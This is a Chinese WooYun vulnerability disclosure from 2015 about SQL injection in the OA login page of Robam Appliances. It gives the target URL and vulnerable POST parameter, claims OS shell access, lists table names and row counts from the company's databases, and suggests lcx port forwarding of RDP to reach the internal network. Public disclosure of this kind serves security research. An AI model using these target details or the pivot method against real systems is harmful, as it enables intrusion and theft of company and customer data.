当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153320

漏洞标题:老板电器某系统SQL注入(可os-shell)泄露大量企业信息

相关厂商:杭州老板电器股份有限公司

漏洞作者: ledoo

提交时间:2015-11-10 16:27

修复时间:2015-12-25 16:28

公开时间:2015-12-25 16:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

专业厨房电器

详细说明:

老板电器OA系统:http://oa.robam.com/oa/login.asp
注入点:(POST)button1=%b5%c7%c2%bc&pwd=1&uid=F uid参数未做过滤

1.png


27个库:

db.png


可os-shell:

shell.png


漏洞证明:

大量企业内部数据:
Database: robam

+---------------------------------------------+---------+
| Table                                       | Entries |
+---------------------------------------------+---------+
| dbo.EB_RECALL_RESULT                        | 20641984 |
| dbo.WF_ACTIVE_HISTORY                       | 15304619 |
| dbo.EB_REPAIR_PROCESS                       | 10388513 |
| dbo.EB_REPAIR_PROCESS_BK                    | 6507983 |
| dbo.ST_STOCK_DETAIL_CENTER_PRODUCT          | 6141723 |
| dbo.EB_CUSTOMER_PRODUCT                     | 5447744 |
| dbo.EB_GOODSBILL_DETAIL_HISTORY             | 4263896 |
| dbo.EB_SELLBILL_DETAIL_HISTORY              | 4262997 |
| dbo.ST_STOCK_BILL_CENTER_PRODUCT            | 4159260 |
| dbo.ST_STOCK_DETAIL_CENTER_PRODUCT_BF       | 4073056 |
| dbo.ST_APPLY_BILL_DETAIL_HISTORY            | 3116113 |
| dbo.EB_GOODSBILL_DETAIL_HISTORY_BK          | 2764312 |
| dbo.EB_REPAIR_HISTORY                       | 2671226 |
| dbo.ST_STOCK_BILL_CENTER_PRODUCT_BF         | 2656724 |
| dbo.WF_STATE_HISTORY                        | 2460002 |
| dbo.EB_CUSTOMER                             | 2171553 |
| dbo.SYS_LOGIN_USERS                         | 2133212 |
| dbo.ST_DAILY_STOCK_CENTER_PRODUCT           | 1971417 |
| dbo.EB_BALANCE_DETAIL                       | 1922419 |
| dbo.EB_GOODS_BILL_HISTORY                   | 1688643 |
| dbo.EB_REPAIR_HISTORY_BK                    | 1628772 |
| dbo.EB_SELL_BILL_HISTORY                    | 1572831 |
| dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_NEW     | 1550110 |
| dbo.EB_REPAIR_FAULTCODE                     | 1397925 |
| dbo.ST_STOCK_DETAIL_OTHER_PRODUCT           | 1295683 |
| dbo.EB_BALANCE_DETAIL_BK                    | 1105139 |
| dbo.EB_GOODS_BILL_HISTORY_BK                | 1086769 |
| dbo.EB_RECALL_HISTORY                       | 894542  |
| dbo.ST_STOCK_BILL_OTHER_PRODUCT             | 865518  |
| dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_NEW     | 857202  |
| dbo.ST_DAILY_STOCK_OTHER_PRODUCT            | 853046  |
| dbo.ST_DAILY_STOCK_CENTER_FITTINGS_NEW      | 807257  |
| dbo.EB_REPAIR_FITTINGS                      | 784124  |
| dbo.ST_STOCK_BILL_CENTER_FITTINGS_NEW       | 741384  |
| dbo.ST_APPLY_BILL_HISTORY                   | 691997  |
| dbo.ST_STOCK_DETAIL_SHOP_PRODUCT            | 590716  |
| dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_OLD     | 511680  |
| dbo.EB_REPAIR_FITTINGS_TEMP                 | 469633  |
| dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_OLD     | 459449  |
| dbo.ST_STOCK_DETAIL_SHOP_PRODUCT_BF         | 447865  |
| dbo.ST_STOCK_BILL_WORKER_FITTINGS_NEW       | 447853  |
| dbo.ST_STOCK_BILL_WORKER_FITTINGS_OLD       | 439128  |
| dbo.ST_STOCK_BILL_CENTER_FITTINGS_OLD       | 379192  |
| dbo.ST_STOCK_DETAIL_CHANNEL_PRODUCT         | 365679  |
| dbo.ST_APPLY_DETAIL_SHOWPIECE_HISTORY       | 341018  |
| dbo.ST_STOCK_BILL_SHOP_PRODUCT              | 325635  |
| dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_NEW       | 325029  |
| dbo.ST_DAILY_STOCK_SHOP_PRODUCT             | 297876  |
| dbo.ST_PACKAGE_DETAIL                       | 281080  |
| dbo.WF_ACTIVE                               | 280034  |
| dbo.ST_SEND_BILL_DETAIL_HISTORY             | 279288  |
| dbo.ST_DAILY_STOCK_CHANNEL_PRODUCT          | 266890  |
| dbo.ST_RETURN_DETAIL_SHOWPIECE_HISTORY      | 262061  |
| dbo.EB_SERVICE_DETAIL                       | 260659  |
| dbo.EB_SELLBILL_DETAIL                      | 246657  |
| dbo.WF_ACTIVE_BK                            | 246640  |
| dbo.EB_REPAIR_FITTINGS_DETAIL               | 239402  |
| dbo.ST_STOCK_BILL_SHOP_PRODUCT_BF           | 231832  |
| dbo.ST_DAILY_STOCK_HEAD_FITTINGS_NEW        | 230008  |
| dbo.ST_DAILY_STOCK_CENTER_FITTINGS_OLD      | 228593  |
| dbo.EB_CUSTOMER_FITTINGS                    | 193663  |
| dbo.ST_MONEY_BILL_WORKER                    | 168248  |
| dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_NEW       | 157316  |
| dbo.EB_CUSTOMER_VIP                         | 139003  |
| dbo.EB_REPAIR                               | 112740  |
| dbo.ST_MONEY_BILL_WORKER_BAK                | 111497  |
| dbo.ST_STOCK_BILL_CHANNEL_PRODUCT           | 110340  |
| dbo.TABLE89                                 | 106284  |
| dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_OLD       | 102738  |
| dbo.ST_DAILY_STOCK_SHOP_FITTINGS_NEW        | 94899   |
| dbo.ST_RETURN_BILL_SHOWPIECE_HISTORY        | 89161   |
| dbo.ST_STOCK_BILL_SHOP_FITTINGS_NEW         | 83769   |
| dbo.ST_APPLY_BILL_SHOWPIECE_HISTORY         | 83203   |
| dbo.WF_APPROVE_HISTORY                      | 77426   |
| dbo.ST_STOCK_TRACK_CHANNEL_PRODUCT          | 77156   |
| dbo.EB_SELL_BILL                            | 75864   |
| dbo.ST_STOCK_TRACK_WORKER_FITTINGS_OLD      | 68195   |
| dbo.EB_REPAIR_FITTINGS_BK                   | 61940   |
| dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_OLD       | 59814   |
| dbo.EB_REPAIR_NOCALL                        | 58181   |
| dbo.EB_GOODSBILL_DETAIL                     | 54096   |
| dbo.ST_STOCK_BILL_SHOP_FITTINGS_OLD         | 47382   |
| dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW      | 44645   |
| dbo.ST_STOCK_TRACK_OTHER_PRODUCT            | 43526   |
| dbo.ST_STOCK_BILL_HEAD_FITTINGS_NEW         | 34841   |
| dbo.ST_DAILY_STOCK_SHOP_FITTINGS_OLD        | 34703   |
| dbo.ST_STOCK_TRACK_CENTER_PRODUCT           | 32642   |
| dbo.ST_DAILY_STOCK_HEAD_FITTINGS_OLD        | 32359   |
| dbo.ST_MONEY_BILL                           | 29214   |
| dbo.ST_SEND_BILL_HISTORY                    | 24706   |
| dbo.WF_STATE                                | 23913   |
| dbo.EB_CHANGESTYLE_DETAIL                   | 23897   |
| dbo.EB_APPEAL_PROCESS                       | 23762   |
| dbo.WF_STATE_BK                             | 23144   |
| dbo.ST_PACKAGE                              | 22869   |
| dbo.EB_GOODS_BILL                           | 21874   |
| dbo.EB_GAS_NEW_DETAIL                       | 21326   |
| dbo.EB_GAS_OLD_DETAIL                       | 21295   |
| dbo.EB_CHANNEL_SELLBILL_DETAIL              | 17701   |
| dbo.EB_GAS_CHANGE                           | 17351   |
| dbo.EB_CHANNEL_SELLBILL_DETAIL_HISTORY      | 16737   |
| dbo.SYS_PART_SUB_FUNC                       | 13198   |
| dbo.SYS_ORGANIZATION                        | 12753   |
| dbo.UR_USERS_PART                           | 11185   |
| dbo.SYS_PART_FUNC                           | 11073   |
| dbo.SYS_ORGANIZATION_BK_100613              | 10424   |
| dbo.EB_CHANNEL_SELL_BILL_HISTORY            | 9374    |
| dbo.SYS_MESSAGE_PERSON                      | 9215    |
| dbo.EB_MARKET                               | 8555    |
| dbo.EB_CHANGE_STYLE                         | 8098    |
| dbo.ST_APPLY_BILL_DETAIL                    | 7956    |
| dbo.ST_STOCK_TRACK_WORKER_FITTINGS_NEW      | 7589    |
| dbo.EB_CHANNEL_SELL_BILL                    | 7218    |
| dbo.ST_STOCK_TRACK_SHOP_FITTINGS_NEW        | 7142    |
| dbo.SYS_MESSAGE                             | 6708    |
| dbo.UR_USERS                                | 6647    |
| dbo.ST_APPLY_DISREPAIR_HISTORY              | 6505    |
| dbo.EB_DELRP_LOG                            | 5831    |
| dbo.CD_SX_BAK                               | 5815    |
| dbo.SYS_FITTINGS                            | 5569    |
| dbo.EB_APPEAL                               | 5540    |
| dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW_0616 | 5463    |
| dbo.EB_SHOP_HUMAN                           | 4740    |
| dbo.ST_STOCK_TRACK_HEAD_FITTINGS_NEW        | 4718    |
| dbo.EB_CONSULTING                           | 4674    |
| dbo.EB_RECALL                               | 4641    |
| dbo.EB_CHANNEL                              | 4554    |
| dbo.CD_SX                                   | 4531    |
| dbo.ST_STOCK_TRACK_HEAD_FITTINGS_OLD        | 4509    |
| dbo.EB_BROWER                               | 4314    |
| dbo.EB_RECALL_CREATE                        | 3980    |
| dbo.EB_PRICE_DETAIL                         | 3974    |
| dbo.ST_STOCK_TRACK_SHOP_PRODUCT             | 3853    |
| dbo.SYS_SERVICE_LOG                         | 3632    |
| dbo.ST_STOCK_TRACK_CENTER_FITTINGS_OLD      | 3064    |
| dbo.ST_STOCK_BILL_HEAD_FITTINGS_OLD         | 2592    |
| dbo.ST_MONEY_LIMIT_WORKER                   | 2085    |
| dbo.ST_SEND_BILL_DETAIL                     | 1893    |
| dbo.EB_OTHERS                               | 1856    |
| dbo.ST_MONEY_LIMIT_WORKER_BAK               | 1708    |
| dbo.SYS_ORGANIZATION_BK2                    | 1678    |
| dbo.SYS_ORGANIZATION_BK                     | 1657    |
| dbo.SYS_ORGANIZATION_LEON                   | 1650    |
| dbo.EB_REPAIR_DISCALL                       | 1643    |
| dbo.EB_BALANCE                              | 1603    |
| dbo.SYS_BOARD_ORG                           | 1143    |
| dbo.ST_APPLY_BILL                           | 1118    |
| dbo.UR_USERS_BK_100613                      | 1100    |
| dbo.EB_SHOP                                 | 1089    |
| dbo.EB_MARKET_BK                            | 1024    |
| dbo.SYS_PRODUCT                             | 900     |
| dbo.WF_STEP_SETTING                         | 801     |
| dbo.SYS_FITTINGS_SAFE_NUM                   | 730     |
| dbo.ST_RETURN_DETAIL_SHOWPIECE              | 719     |
| dbo.SYS_SUB_FUNC                            | 699     |
| dbo.EB_REPAIR_NONUM                         | 602     |
| dbo.ST_APPLY_DETAIL_SHOWPIECE               | 585     |
| dbo.EB_GOODS_CHANGE                         | 545     |
| dbo.RTS_REPORT_DETAIL_CONDITION             | 510     |
| dbo.SMS_MESSAGE_LOG                         | 479     |
| dbo.ST_STOCK_TRACK_SHOP_FITTINGS_OLD        | 474     |
| dbo.RTS_REPORT_DETAIL_PART                  | 462     |
| dbo.SYS_FAULT_CODE                          | 443     |
| dbo.EB_WORKERGROUP                          | 404     |
| dbo.EB_CHANNEL_BK                           | 358     |
| dbo.CD_TELAREA                              | 346     |
| dbo.SYS_FUNCTION                            | 304     |
| dbo.UR_PART                                 | 264     |
| dbo.ST_RETURN_BILL_SHOWPIECE                | 223     |
| dbo.WF_STEP_RELATIONSHIP                    | 203     |
| dbo.WF_STEP                                 | 193     |
| dbo.WF_STEP_GRAPHIC                         | 193     |
| dbo.ID_CODEID                               | 189     |
| dbo.ST_APPLY_BILL_SHOWPIECE                 | 182     |
| dbo.EB_QNAIRE_ITEM                          | 179     |
| dbo.ST_SEND_BILL                            | 174     |
| dbo.EB_KNOWLEDGE_ARTICLE                    | 171     |
| dbo.WF_FUNCTION_SETTING                     | 136     |
| dbo.SYS_MESSAGE_GROUP                       | 104     |
| dbo.ST_MONEY_LIMIT                          | 92      |
| dbo.ST_TEMP_TRACK_CENTER_FITTINGS_NEW       | 81      |
| dbo.ORG_ID_FLOWID                           | 78      |
| dbo.EB_QNAIRE_QUESTION                      | 75      |
| dbo.RTS_REPORT_SETTING                      | 75      |
| dbo.SYS_ORG_GROUP_DETAIL                    | 75      |
| dbo.RTS_REPORT_CONDITION                    | 74      |
| dbo.CD_BILL_TYPE                            | 68      |
| dbo.SMS_MESSAGE_SEND                        | 64      |
| dbo.CD_SX_TO                                | 60      |
| dbo.SYS_USER_GROUP_MEMBER                   | 46      |
| dbo.SMS_SendMessage                         | 36      |
| dbo.SYS_CATEGORY                            | 32      |
| dbo.EB_QUESTION_TYPE                        | 31      |
| dbo.WF_WORKFLOW_MODEL                       | 28      |
| dbo.EB_BALANCE_DETAIL_OTHER                 | 27      |
| dbo.EB_FEE_POLICY_DETAIL                    | 27      |
| dbo.WF_OPERATION_FUNCTION                   | 27      |
| dbo.CD_YEAR                                 | 26      |
| dbo.EB_KNOWLEDGE_CATEGORY                   | 26      |
| dbo.CD_SEND_TYPE                            | 23      |
| dbo.CD_MESSAGESEND_STATUS                   | 22      |
| dbo.ID_FLOWID                               | 21      |
| dbo.SMS_MESSAGE_CONDITION                   | 21      |
| dbo.CD_APPEAL_TYPE                          | 18      |
| dbo.SYS_BOARD                               | 18      |
| dbo.CD_OUT_SUBJECT_CENTER_PRODUCT           | 17      |
| dbo.SMS_MESSAGE_EMPLOYEEADD                 | 17      |
| dbo.SMS_MESSAGE_TASK                        | 17      |
| dbo.SYS_BOARD_GROUP                         | 17      |
| dbo.CD_OUT_SUBJECT_OTHER_PRODUCT            | 16      |
| dbo.CD_OUT_SUBJECT_SHOP_PRODUCT             | 16      |
| dbo.CD_REPAIR_METHOD                        | 16      |
| dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_NEW      | 15      |
| dbo.CD_IN_SUBJECT_CENTER_PRODUCT            | 14      |
| dbo.EB_QNAIRE_TEMPLATE                      | 14      |
| dbo.SMS_MESSAGE_TEMPLATE                    | 14      |
| dbo.SMS_ReceiveMessage                      | 14      |
| dbo.ST_STOCK_TABLE_NAME                     | 14      |
| dbo.EB_SELLBILL_DETAIL_SELLER               | 13      |
| dbo.CD_IN_SUBJECT_OTHER_PRODUCT             | 12      |
| dbo.CD_IN_SUBJECT_SHOP_PRODUCT              | 12      |
| dbo.CD_MONTH                                | 12      |
| dbo.SMS_MESSAGE_EMPLOYEEADD_GROUP_DETAIL    | 12      |
| dbo.CD_EDUCATION                            | 11      |
| dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_NEW        | 11      |
| dbo.CD_PRODUCT_CUSTOMER                     | 11      |
| dbo.WF_CD_ACTIVE_STATUS                     | 11      |
| dbo.ZQ_CUSTOMER                             | 11      |
| dbo.CD_ORG_PRICE                            | 10      |
| dbo.CD_IN_SUBJECT_CENTER_FITTINGS_NEW       | 9       |
| dbo.CD_IN_SUBJECT_HEAD_FITTINGS_NEW         | 9       |
| dbo.CD_REPAIR_STATUS                        | 9       |
| dbo.RTS_CD_REPORT_GROUP                     | 9       |
| dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_NEW        | 8       |
| dbo.EB_SALES_INFO                           | 8       |
| dbo.EB_SELLER                               | 8       |
| dbo.SMS_ISR                                 | 8       |
| dbo.ST_APPLY_DISREPAIR                      | 8       |
| dbo.CD_APPLY_BILL_STATUS                    | 7       |
| dbo.CD_IN_SUBJECT_HEAD_FITTINGS_OLD         | 7       |
| dbo.CD_OUT_SUBJECT_PRODUCT                  | 7       |
| dbo.SMS_MESSAGE_USERHIDE                    | 7       |
| dbo.CD_CONSULT_TYPE                         | 6       |
| dbo.CD_IN_SUBJECT_CENTER_FITTINGS_OLD       | 6       |
| dbo.CD_ORG_LEVEL                            | 6       |
| dbo.CD_ORG_PRODUCT_PRICE                    | 6       |
| dbo.CD_REPAIR_TYPE                          | 6       |
| dbo.CD_WF_CHANGE                            | 6       |
| dbo.CD_YYMM                                 | 6       |
| dbo.CODE_TABLE_LIST                         | 6       |
| dbo.EB_PRODUCT_USER_DETAIL                  | 6       |
| dbo.CD_BUY_REASON                           | 5       |
| dbo.CD_COLORS                               | 5       |
| dbo.CD_CUSTOMER_FEEL                        | 5       |
| dbo.CD_IN_SUBJECT_PRODUCT                   | 5       |
| dbo.CD_IN_SUBJECT_SHOP_FITTINGS_NEW         | 5       |
| dbo.CD_IN_SUBJECT_SHOP_FITTINGS_OLD         | 5       |
| dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_OLD      | 5       |
| dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_OLD        | 5       |
| dbo.CD_QUESTION_TYPE                        | 5       |
| dbo.CD_RECALL_TYPE                          | 5       |
| dbo.CD_REPAIR_FEE_TYPE                      | 5       |
| dbo.EB_CUSTOMER_FEEL                        | 5       |
| dbo.RTS_CD_FIELD_EDIT_TYPE                  | 5       |
| dbo.WF_CD_WORKFLOW_STATUS                   | 5       |
| dbo.CD_ADVERSARY                            | 4       |
| dbo.CD_APPEAL_LEVEL                         | 4       |
| dbo.CD_APPEAL_SOURCE                        | 4       |
| dbo.CD_APPEAL_STATUS                        | 4       |
| dbo.CD_BALANCE_STATUS                       | 4       |
| dbo.CD_BOOK_TIME                            | 4       |
| dbo.CD_CUS_JOB                              | 4       |
| dbo.CD_INVOICE_LEVEL                        | 4       |
| dbo.CD_MEMBER_TYPE                          | 4       |
| dbo.CD_OTHERS_TYPE                          | 4       |
| dbo.CD_PRODUCT_TYPE                         | 4       |
| dbo.CD_PROMOTION                            | 4       |
| dbo.CD_RECALL_FACT                          | 4       |
| dbo.CD_SELLPRO_STATUS                       | 4       |
| dbo.CD_SEND_INFO                            | 4       |
| dbo.CD_STOCK_PRODUCT_ATTRIBUTE              | 4       |
| dbo.SYS_RECALL_SETUP                        | 4       |
| dbo.WF_CD_ORG_LEVEL                         | 4       |
| dbo.CD_ADV_TYPE                             | 3       |
| dbo.CD_COUNT_UNIT                           | 3       |
| dbo.CD_CUS_REGION                           | 3       |
| dbo.CD_CUS_SATIS                            | 3       |
| dbo.CD_CUSPROD_REPAIR                       | 3       |
| dbo.CD_FAULT_GRADE                          | 3       |
| dbo.CD_INSTALL_SITE                         | 3       |
| dbo.CD_INVOICE_TYPE                         | 3       |
| dbo.CD_ISLSF                                | 3       |
| dbo.CD_OUT_SUBJECT_CHANNEL_PRODUCT          | 3       |
| dbo.CD_PACKAGE_STATUS                       | 3       |
| dbo.CD_POLICY                               | 3       |
| dbo.CD_PRESENT_DEPTH                        | 3       |
| dbo.CD_PRODUCT_LEVEL                        | 3       |
| dbo.CD_RECALL_STATE                         | 3       |
| dbo.CD_RECALL_STATUS                        | 3       |
| dbo.CD_REPAIR_MODE                          | 3       |
| dbo.CD_REPAIR_PRI                           | 3       |
| dbo.CD_REPAIR_URGENT                        | 3       |
| dbo.CD_SELLBILL_STATUS                      | 3       |
| dbo.CD_SERVER_MODE                          | 3       |
| dbo.EB_FEE_POLICY                           | 3       |
| dbo.SYS_FITTINGS_PLACE                      | 3       |
| dbo.SYS_USER_GROUP                          | 3       |
| dbo.temp                                    | 3       |
| dbo.WF_CD_FUNCTION_TYPE                     | 3       |
| dbo.WF_CD_STEP_TYPE                         | 3       |
| dbo.WF_USER_DELEGATE                        | 3       |
| dbo.CD_APPROVE                              | 2       |
| dbo.CD_CONSULT_STATUS                       | 2       |
| dbo.CD_CUS_TYPE                             | 2       |
| dbo.CD_FAULT_TYPE                           | 2       |
| dbo.CD_FEP_PAY_TYPE                         | 2       |
| dbo.CD_FEP_PAY_WAY                          | 2       |
| dbo.CD_FITTINGS_TYPE                        | 2       |
| dbo.CD_GOODS_WAY                            | 2       |
| dbo.CD_IN_SUBJECT_CHANNEL_PRODUCT           | 2       |
| dbo.CD_MONEY_CHANGE_TYPE                    | 2       |
| dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_OLD        | 2       |
| dbo.CD_PART_TYPE                            | 2       |
| dbo.CD_PAY_STATUS                           | 2       |
| dbo.CD_PREMONEY_PLACE                       | 2       |
| dbo.CD_PRINT_STATE                          | 2       |
| dbo.CD_PROD_TYPE                            | 2       |
| dbo.CD_PRODUCE_TYPE                         | 2       |
| dbo.CD_PRODUCT_STATUS                       | 2       |
| dbo.CD_RECALL_MOD                           | 2       |
| dbo.CD_REPAIR_LEVEL                         | 2       |
| dbo.CD_REPAIR_SORT                          | 2       |
| dbo.CD_RPT_INOUT                            | 2       |
| dbo.CD_RPT_NEWOLD                           | 2       |
| dbo.CD_RPT_SUBJECT                          | 2       |
| dbo.CD_SELLPRODUCT_TYPE                     | 2       |
| dbo.CD_SEX                                  | 2       |
| dbo.CD_USE_STATUS                           | 2       |
| dbo.CD_YESNO                                | 2       |
| dbo.EB_SELL_BILL_SELLER                     | 2       |
| dbo.ST_MONEY_BILL_PRODUCT                   | 2       |
| dbo.ST_MONEY_LIMIT_PRODUCT                  | 2       |
| dbo.WF_CD_OCCUPY_TYPE                       | 2       |
| dbo.WF_CD_USER_DELEGATE_STATUS              | 2       |
| dbo.ZQ_CUSTOMER_PRODUCT                     | 2       |
| dbo.CD_IN_SUBJECT_WORKER_FITTINGS_NEW       | 1       |
| dbo.CD_IN_SUBJECT_WORKER_FITTINGS_OLD       | 1       |
| dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_NEW      | 1       |
| dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_OLD      | 1       |
| dbo.CD_RPTOTAL_CUS                          | 1       |
| dbo.CD_SERVICE_CONDITON                     | 1       |
| dbo.EB_FEE_TRANS                            | 1       |
| dbo.EB_GZ                                   | 1       |
| dbo.EB_KNOWLEDGE_SEARCH                     | 1       |
| dbo.EB_MINPRICE_PRODUCT                     | 1       |
| dbo.EB_PBFEE_DETAIL                         | 1       |
| dbo.EB_PRODUCT_USER                         | 1       |
| dbo.SMS_MESSAGE_DISPATCH                    | 1       |
| dbo.SMS_Register                            | 1       |
| dbo.ST_STOCK_SETTING                        | 1       |
| dbo.SYS_ORG_GROUP                           | 1       |
+---------------------------------------------+---------+


Database: portal

+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.UserTrackerPath        | 8560269 |
| dbo.UserTracker            | 889885  |
| dbo.AnnouncementsView      | 207526  |
| dbo.Permission_            | 60027   |
| dbo.Users_Permissions      | 56106   |
| dbo.userdata2              | 29558   |
| dbo.UserData               | 29307   |
| dbo.LayoutSet              | 19617   |
| dbo.QuestionnaireAnswer    | 17989   |
| dbo.Resource_              | 12333   |
| dbo.UserGroupRole          | 10464   |
| dbo.Group_                 | 9812    |
| dbo.Users_Roles            | 9484    |
| dbo.Users_Groups           | 9480    |
| dbo.Users_UserGroups       | 4481    |
| dbo.AnnouncementsDelivery  | 3543    |
| dbo.Contact_               | 2770    |
| dbo.User_                  | 2769    |
| dbo.PortletPreferences     | 2706    |
| dbo.temp_users             | 2265    |
| dbo.TagsAsset              | 2208    |
| dbo.User_bak               | 2010    |
| dbo.user38                 | 1851    |
| dbo.MyMenu                 | 1736    |
| dbo.Chat_Status            | 1729    |
| dbo.BrowserTracker         | 1722    |
| dbo.UNUser                 | 1665    |
| dbo.Groups_Permissions     | 1547    |
| dbo.CalMapping             | 1530    |
| dbo.MyProperties           | 1468    |
| dbo.Image                  | 1426    |
| dbo.tmpuserid              | 1228    |
| dbo.ResourceCode           | 1183    |
| dbo.User__bak              | 1183    |
| dbo.Phone                  | 826     |
| dbo.IGImage                | 702     |
| dbo.Users_Orgs_bak         | 695     |
| dbo.tmp_phone              | 654     |
| dbo.Phone3                 | 646     |
| dbo.Chat_Entry             | 633     |
| dbo.CalEvent               | 573     |
| dbo.Announcements          | 540     |
| dbo.UserMenu               | 533     |
| dbo.CalEvent_bak           | 502     |
| dbo.DLFileRank             | 419     |
| dbo.AnnouncementFile       | 403     |
| dbo.Organization_          | 322     |
| dbo.Users_Orgs             | 300     |
| dbo._sessioninfo           | 282     |
| dbo.QuestionnaireReply     | 279     |
| dbo.QuestionnaireChoice    | 240     |
| dbo.QuestionnaireStat      | 240     |
| dbo.Region                 | 236     |
| dbo.EventHistory           | 231     |
| dbo.Country                | 227     |
| dbo.Users_Orgs_0306        | 194     |
| dbo.ClassName_             | 174     |
| dbo.Phone2                 | 173     |
| dbo.SocialActivity         | 165     |
| dbo.tmporg                 | 142     |
| dbo.tmporg2                | 141     |
| dbo.Roles_Permissions      | 115     |
| dbo.UserMap                | 72      |
| dbo.UserMapPicture         | 72      |
| dbo.ListType               | 63      |
| dbo.QuestionnaireQuestion  | 60      |
| dbo.EventHistoryView       | 54      |
| dbo.Sidmapping             | 27      |
| dbo.IGFolder               | 23      |
| dbo.ForeignCompany         | 20      |
| dbo.ForeignCompanyUser     | 18      |
| dbo.DataMaskRule           | 16      |
| dbo.EmailAddress           | 16      |
| dbo.PersonalInfoCol        | 16      |
| dbo.czguser                | 15      |
| dbo.Layout                 | 13      |
| dbo.Counter                | 12      |
| dbo.Role_                  | 11      |
| dbo.OrgLabor               | 10      |
| dbo.SysProperties          | 9       |
| dbo.Label                  | 7       |
| dbo.Marquee                | 7       |
| dbo.BookingSessionDevice   | 6       |
| dbo.BookingSessionRoom     | 6       |
| dbo.Message                | 6       |
| dbo.CalEventFile           | 5       |
| dbo.MsgEventFile           | 5       |
| dbo.QUARTZ_LOCKS           | 5       |
| dbo.UserGroup              | 5       |
| dbo.MBDiscussion           | 4       |
| dbo.MBMessage              | 4       |
| dbo.MBThread               | 4       |
| dbo.Address                | 3       |
| dbo.AnnouncementType       | 3       |
| dbo.DLFileEntry            | 3       |
| dbo.ForeignCompanyMapping  | 3       |
| dbo.PollsChoice            | 3       |
| dbo.AnnouncementFileTemp   | 2       |
| dbo.DLFolder               | 2       |
| dbo.MBCategory             | 2       |
| dbo.RatingsEntry           | 2       |
| dbo.RatingsStats           | 2       |
| dbo.UserMenuIcon           | 2       |
| dbo.Account_               | 1       |
| dbo.BookingSessionRoomFile | 1       |
| dbo.Company                | 1       |
| dbo.DscGroupCal            | 1       |
| dbo.Label_Portlet          | 1       |
| dbo.MBMailingList          | 1       |
| dbo.PasswordPolicy         | 1       |
| dbo.PollsQuestion          | 1       |
| dbo.Questionnaire          | 1       |
| dbo.QuestionnaireType      | 1       |
| dbo.Release_               | 1       |
| dbo.ServiceComponent       | 1       |
| dbo.SessionRoom            | 1       |
+----------------------------+---------+


用lcx之类将3389做端口转发,可内网

host.png

修复方案:

检查

版权声明:转载请注明来源 ledoo@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)